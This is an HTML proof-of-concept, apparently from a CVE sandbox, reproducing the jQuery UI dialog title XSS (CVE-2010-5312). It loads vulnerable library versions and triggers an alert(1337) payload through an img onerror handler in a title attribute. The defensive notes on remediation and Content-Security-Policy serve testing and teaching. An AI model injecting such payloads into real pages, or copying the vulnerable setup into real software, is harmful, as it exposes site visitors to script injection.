<!--
CVE Sandbox :: jQuery UI :: CVE-2010-5312
Version: jQuery UI < 1.10.0
------------------------------------------------------------------------------------
The XSS payload is injected into the "title" attribute of an HTML element.
The payload executes when the dialog widget is initialized on that element.
------------------------------------------------------------------------------------
Reviewer notes (defensive view):
* The markup inside the attribute is inert while it remains an attribute value.
  It becomes live only when the affected dialog widget copies the title into its
  title bar as HTML. Attribute-encoding untrusted data on output therefore does
  not protect a page that runs an affected jQuery UI release.
* Remediation: upgrade to jQuery UI 1.10.0 or later, where the dialog title is
  inserted as text. Inventory pages and bundles that still ship an older release.
* Defense in depth: a Content-Security-Policy that disallows inline script also
  blocks inline event handlers such as the onerror used here.
------------------------------------------------------------------------------------
POC Author: https://twitter.com/therceman
-->
<!-- Pinned to jQuery 1.9.1 and jQuery UI 1.9.2 (below the 1.10.0 line stated in
     the header) so the behavior reproduces. These are test-fixture versions.
     The CDN loads below carry no integrity attribute. -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
<link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/themes/base/jquery-ui.css">
<!-- Test input: the title value is an img element whose onerror handler calls
     alert(1337), used only as a visible marker that script execution occurred. -->
<div id="dialog" title="<img src=1 onerror=alert(1337)>">
<p>Dialog Content</p>
</div>
<!-- Initialization of Dialog: .dialog() takes the element's title attribute as
     the dialog title. On the affected version this call is where the handler
     fires, so the scripts above must have loaded before it runs. -->
<script>
$('#dialog').dialog();
</script>